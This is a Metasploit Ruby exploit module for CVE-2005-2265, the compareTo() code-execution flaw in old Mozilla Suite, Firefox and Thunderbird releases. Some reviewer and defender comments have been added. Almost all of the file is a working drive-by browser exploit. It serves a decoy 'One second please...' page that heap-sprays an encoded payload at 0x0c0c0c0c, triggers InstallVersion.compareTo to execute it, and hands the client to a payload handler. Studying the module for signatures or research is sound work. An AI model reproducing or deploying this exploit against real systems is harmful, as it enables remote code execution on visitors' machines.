rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/mozilla_compareto.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
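# Metasploit browser module for CVE-2005-2265 (MFSA 2005-50), the
# InstallVersion.compareTo() code-execution flaw in the Mozilla Suite,
# Firefox and Thunderbird.
#
# The module runs as an HTTP server and answers every request for its URI
# with one HTML page built by #generate_html.
#
# Defender notes:
# * The target name below reads "Firefox < 1.0.5, Mozilla < 1.7.10", which
#   suggests those are the fixed releases; confirm against MFSA 2005-50
#   before using them as a patch baseline.
# * The static parts of the served page (the title, the attribution comment,
#   the InstallVersion/compareTo call and the 0x0c0c0c0c constant) are the
#   same on every request as written here, so they are usable for
#   content-inspection signatures. The encoded payload and whatever
#   js_heap_spray emits are not visible in this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10
  # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.
  # NOTE(review): the upper bound quoted here (mozilla 1.7.10 affected) does
  # not match the target name in #initialize ("Mozilla < 1.7.10"); confirm
  # which one is right against the vendor advisory.
  # autopwn_info({
  #   :ua_name => HttpClients::FF,
  #   :ua_minver => "1.0",
  #   :ua_maxver => "1.7.10",
  #   :os_name => OperatingSystems::Match::WINDOWS,
  #   :javascript => true,
  #   :rank => NormalRanking, # reliable memory corruption
  #   :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
  # })

  # Registers the module metadata (name, references, payload constraints,
  # the single Windows/x86 target and the disclosure date).
  #
  # @param info [Hash] metadata supplied by the framework and merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mozilla Suite/Firefox compareTo() Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
          module is a direct port of Aviv Raff's HTML PoC.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],
        'References' => [
          ['CVE', '2005-2265'],
          ['OSVDB', '17968'],
          ['BID', '14242'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
        ],
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00",
        },
        'Platform' => %w{win},
        'Targets' => [
          # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
          # WinXP-SP3 and Win2kAS-SP0
          [
            'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x0c0c0c0c,
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2005-07-13',
        # NOTE(review): reliability, stability and side effects are all left
        # undeclared (UNKNOWN_*), so the effect of a run on the target browser
        # process should be treated as unverified until these are filled in.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request callback: builds a fresh payload for the connecting client,
  # sends the generated page as text/html and then hands the client to the
  # payload handler. Returns early, sending nothing, when no payload could
  # be generated.
  #
  # @param cli the client connection passed in by the HTTP server mixin
  # @param request the incoming request (not inspected here, so the same
  #   page goes to every requester regardless of User-Agent)
  def on_request_uri(cli, request)
    # Re-generate the payload. The local is not called `p`, which would
    # shadow Kernel#p inside this method.
    fresh_payload = regenerate_payload(cli)
    return if fresh_payload.nil?

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(fresh_payload), { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

  # Builds the HTML/JavaScript page that is served to the client.
  #
  # The encoded payload is converted with Rex::Text.to_unescape using the
  # target architecture's endianness, and target.ret is formatted as an
  # 8-digit hex literal for the page script. js_heap_spray is defined outside
  # this file; presumably it supplies the sprayHeap() function that the page
  # calls (confirm against the HttpServer::HTML mixin).
  #
  # The previously computed but never referenced locals (enc_nops, spray_to,
  # spray_slide1, spray_slide2) have been dropped; none of them was
  # interpolated into the page.
  #
  # @param payload the generated payload; only #encoded is read
  # @return [String] the complete HTML document
  def generate_html(payload)
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    eax_address = sprintf("0x%.8x", target.ret)

    %Q|
<html>
<head>
<!--
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
Greets: SkyLined, The Insider and shutdown
-->
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad()
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};

#{js_heap_spray}
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Payload - Just return..
var payLoadCode=unescape("#{enc_code}");

// Size of the heap blocks
var heapBlockSize=0x400000;
sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));

// Set address to fake "pdata".
var eaxAddress = #{eax_address};

// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
// -->
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
|
  end
end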